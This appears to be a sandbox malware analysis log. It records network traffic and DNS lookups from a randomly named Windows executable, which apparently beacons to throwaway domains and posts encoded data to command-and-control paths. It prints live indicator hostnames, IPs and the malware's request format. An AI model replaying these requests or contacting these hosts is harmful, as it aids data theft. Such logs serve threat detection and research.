                                                                                                            Jan 11, 2025 04:26:25.340632915 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.792084932 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.792206049 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:26.837893009 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:26.842737913 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:27.857876062 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:27.862956047 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:27.863070965 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:27.877451897 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:27.882220030 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.319511890 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.319631100 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.319643974 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320205927 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320218086 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320230007 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320256948 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.320256948 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.320501089 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.320935965 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320947886 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320960045 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320971966 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.322635889 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.326208115 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.331041098 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.020848036 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:34.025979042 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.026112080 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:34.042489052 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:34.047389984 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.955912113 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.956032991 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.956099987 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:35.556700945 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.576488972 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.581321955 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:36.581479073 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.601918936 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.606829882 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:37.526745081 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:37.526911974 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:37.526967049 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:38.104290009 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.122426033 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.127296925 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:39.127558947 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.142880917 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.147838116 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:39.147875071 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:40.085506916 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:40.085541964 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:40.085710049 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:40.650506020 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.669316053 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.674288988 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:41.674388885 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.683470964 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.688283920 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:43.085395098 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:43.085490942 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:43.085551977 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:43.088551044 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:43.093385935 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.146002054 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:48.150985956 CET805001477.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.151079893 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:48.166335106 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:48.171228886 CET805001477.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.756928921 CET805001477.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.757055998 CET805001477.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.757174969 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:49.681694031 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.701225996 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.706161022 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:50.706291914 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.723418951 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:50.728262901 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:51.299280882 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:51.299370050 CET805001577.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:51.299442053 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:52.232302904 CET5001580192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.248505116 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.253459930 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.253563881 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.271564007 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:53.276498079 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.276628971 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.846975088 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.847088099 CET805001677.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:53.847158909 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:54.775410891 CET5001680192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.794064045 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.799305916 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:55.799438000 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.811008930 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:55.816035986 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:56.407304049 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:56.407331944 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:56.407541990 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:56.418941975 CET5001780192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:56.423723936 CET805001777.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:27:01.666709900 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:01.671679974 CET8050018208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:01.671866894 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:01.692235947 CET5001880192.168.2.6208.91.197.27
                                                                                                            Jan 11, 2025 04:27:01.697084904 CET8050018208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:02.189126015 CET8050018208.91.197.27192.168.2.6
                                                                                                            Jan 11, 2025 04:27:02.189456940 CET5001880192.168.2.6208.91.197.27
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 04:25:14.538187981 CET | 192.168.2.6 | 1.1.1.1 | 0x16cf | Standard query (0) | www.7261ltajbc.bond | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:30.826420069 CET | 192.168.2.6 | 1.1.1.1 | 0x501b | Standard query (0) | www.muasamgiare.click | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.078175068 CET | 192.168.2.6 | 1.1.1.1 | 0xc3a2 | Standard query (0) | www.kkpmoneysocial.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:58.545001984 CET | 192.168.2.6 | 1.1.1.1 | 0xc065 | Standard query (0) | www.artkub.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:06.716489077 CET | 192.168.2.6 | 1.1.1.1 | 0x4b96 | Standard query (0) | www.happyjam.life | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:20.169841051 CET | 192.168.2.6 | 1.1.1.1 | 0xfeb | Standard query (0) | www.123hellodrive.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:33.341933012 CET | 192.168.2.6 | 1.1.1.1 | 0xc37f | Standard query (0) | www.zoomlive.live | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:48.109494925 CET | 192.168.2.6 | 1.1.1.1 | 0x1eeb | Standard query (0) | www.dietcoffee.online | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:01.441307068 CET | 192.168.2.6 | 1.1.1.1 | 0x2e22 | Standard query (0) | www.guacamask.online | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:15.342020988 CET | 192.168.2.6 | 1.1.1.1 | 0xef23 | Standard query (0) | www.appsolucao.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.670289993 CET | 192.168.2.6 | 1.1.1.1 | 0xf620 | Standard query (0) | www.aziziyeescortg.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 04:25:14.890705109 CET | 1.1.1.1 | 192.168.2.6 | 0x16cf | No error (0) | www.7261ltajbc.bond |  | 154.12.28.184 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:31.297951937 CET | 1.1.1.1 | 192.168.2.6 | 0x501b | No error (0) | www.muasamgiare.click | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:25:31.297951937 CET | 1.1.1.1 | 192.168.2.6 | 0x501b | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:31.297951937 CET | 1.1.1.1 | 192.168.2.6 | 0x501b | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.216362000 CET | 1.1.1.1 | 192.168.2.6 | 0xc3a2 | No error (0) | www.kkpmoneysocial.top |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.216362000 CET | 1.1.1.1 | 192.168.2.6 | 0xc3a2 | No error (0) | www.kkpmoneysocial.top |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.216362000 CET | 1.1.1.1 | 192.168.2.6 | 0xc3a2 | No error (0) | www.kkpmoneysocial.top |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.216362000 CET | 1.1.1.1 | 192.168.2.6 | 0xc3a2 | No error (0) | www.kkpmoneysocial.top |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.216362000 CET | 1.1.1.1 | 192.168.2.6 | 0xc3a2 | No error (0) | www.kkpmoneysocial.top |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.216362000 CET | 1.1.1.1 | 192.168.2.6 | 0xc3a2 | No error (0) | www.kkpmoneysocial.top |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:25:45.216362000 CET | 1.1.1.1 | 192.168.2.6 | 0xc3a2 | No error (0) | www.kkpmoneysocial.top |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:06.754842997 CET | 1.1.1.1 | 192.168.2.6 | 0x4b96 | No error (0) | www.happyjam.life |  | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:20.215799093 CET | 1.1.1.1 | 192.168.2.6 | 0xfeb | No error (0) | www.123hellodrive.shop | 123hellodrive.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:26:20.215799093 CET | 1.1.1.1 | 192.168.2.6 | 0xfeb | No error (0) | 123hellodrive.shop |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:33.999340057 CET | 1.1.1.1 | 192.168.2.6 | 0xc37f | No error (0) | www.zoomlive.live |  | 154.208.202.225 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:26:48.142772913 CET | 1.1.1.1 | 192.168.2.6 | 0x1eeb | No error (0) | www.dietcoffee.online |  | 77.68.64.45 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:01.663593054 CET | 1.1.1.1 | 192.168.2.6 | 0x2e22 | No error (0) | www.guacamask.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:15.544190884 CET | 1.1.1.1 | 192.168.2.6 | 0xef23 | No error (0) | www.appsolucao.shop | appsolucao.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:27:15.544190884 CET | 1.1.1.1 | 192.168.2.6 | 0xef23 | No error (0) | appsolucao.shop |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.700617075 CET | 1.1.1.1 | 192.168.2.6 | 0xf620 | No error (0) | www.aziziyeescortg.xyz |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.700617075 CET | 1.1.1.1 | 192.168.2.6 | 0xf620 | No error (0) | www.aziziyeescortg.xyz |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.700617075 CET | 1.1.1.1 | 192.168.2.6 | 0xf620 | No error (0) | www.aziziyeescortg.xyz |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.700617075 CET | 1.1.1.1 | 192.168.2.6 | 0xf620 | No error (0) | www.aziziyeescortg.xyz |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.700617075 CET | 1.1.1.1 | 192.168.2.6 | 0xf620 | No error (0) | www.aziziyeescortg.xyz |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.700617075 CET | 1.1.1.1 | 192.168.2.6 | 0xf620 | No error (0) | www.aziziyeescortg.xyz |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:27:28.700617075 CET | 1.1.1.1 | 192.168.2.6 | 0xf620 | No error (0) | www.aziziyeescortg.xyz |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49987 | 154.12.28.184 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:25:14.926553965 CET | 487 | OUT | GET /vt4e/?I8A=fF8h_X3X0TB&9PZt=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.7261ltajbc.bond
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Jan 11, 2025 04:25:15.778045893 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:25:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49992 | 18.139.62.226 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:25:31.321279049 CET | 756 | OUT | POST /bsye/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.muasamgiare.click
                                                                                                            Referer: http://www.muasamgiare.click/bsye/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4VDvKMWbFEA/KPn42K/VJZ3YKbVSBErNOTMKkQDOBKN1
Jan 11, 2025 04:25:32.258096933 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49993 | 18.139.62.226 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:25:33.880604029 CET | 780 | OUT | POST /bsye/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.muasamgiare.click
                                                                                                            Referer: http://www.muasamgiare.click/bsye/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO02vu5EoaEFEZFmnqTaynn9QroR49XyzYsrHtbUFVmq7OT8jHVrj7jAXla8tYdMHNsHlptJs7B1WmZhOnxRSAQc00lLvJpgCPyrefOxjMXZMiICKkX3gsUj7i3e5AsmgGVE8P56iq5/2bJXaKZNgBkrnMT0K2HPpO+oW7GoBwhCMs94ptSW/jCzvmw==
Jan 11, 2025 04:25:34.806237936 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49994 | 18.139.62.226 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:25:36.424560070 CET | 1793 | OUT | POST /bsye/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.muasamgiare.click
                                                                                                            Referer: http://www.muasamgiare.click/bsye/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: 9PZt= [TRUNCATED]
Jan 11, 2025 04:25:37.356348991 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49995 | 18.139.62.226 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:25:39.121903896 CET | 489 | OUT | GET /bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.muasamgiare.click
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Jan 11, 2025 04:25:40.057163954 CET | 526 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Server: openresty
                                                                                                            Date: Sat, 11 Jan 2025 03:25:39 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 166
                                                                                                            Connection: close
                                                                                                            Location: https://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TB
                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            5 | 192.168.2.6 | 49996 | 104.21.112.1 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:25:45.245505095 CET | 759 | OUT | POST /86am/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.kkpmoneysocial.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.kkpmoneysocial.top
                                                                                                            Referer: http://www.kkpmoneysocial.top/86am/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=6q6n6VLzU8esJBZmj0/EXgzsMKIFAPZNOa1yvYcOWBCPSE1Hf9TV2hOvTB0iwl4/hQI8biLNg+UVnUM0Fbjq/vaLrwUvSamsy+yHFy0e5oMUzY3f+OsZ17+LGXdHyWN8EmNbHQiFAGx41YYPTVknF8FzuRNd39nsKVefAREkKwVqZ4dE0/+EECCNYFqZ1GIVKIyfCJdAXlZj
                                                                                                            Jan 11, 2025 04:25:45.859392881 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:25:45 GMT
                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: loclang=en; expires=Tue, 14-Jan-2025 03:25:45 GMT; Max-Age=259200; path=/
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TuuziQIfBTG7rWC6sp5Ne0PHoCzhZJBlMLiEsbvdrcj%2Bqac3OCOlYog76itk1m3YBV0hVnuY%2FF3aAfkrz4xxFpwI7mzipwgwoQlm%2BfZCPsPqBlyjLv9CDXC%2BL8eayISk0cX%2Fv4BbLQ5l"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cd282ad80f5b-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
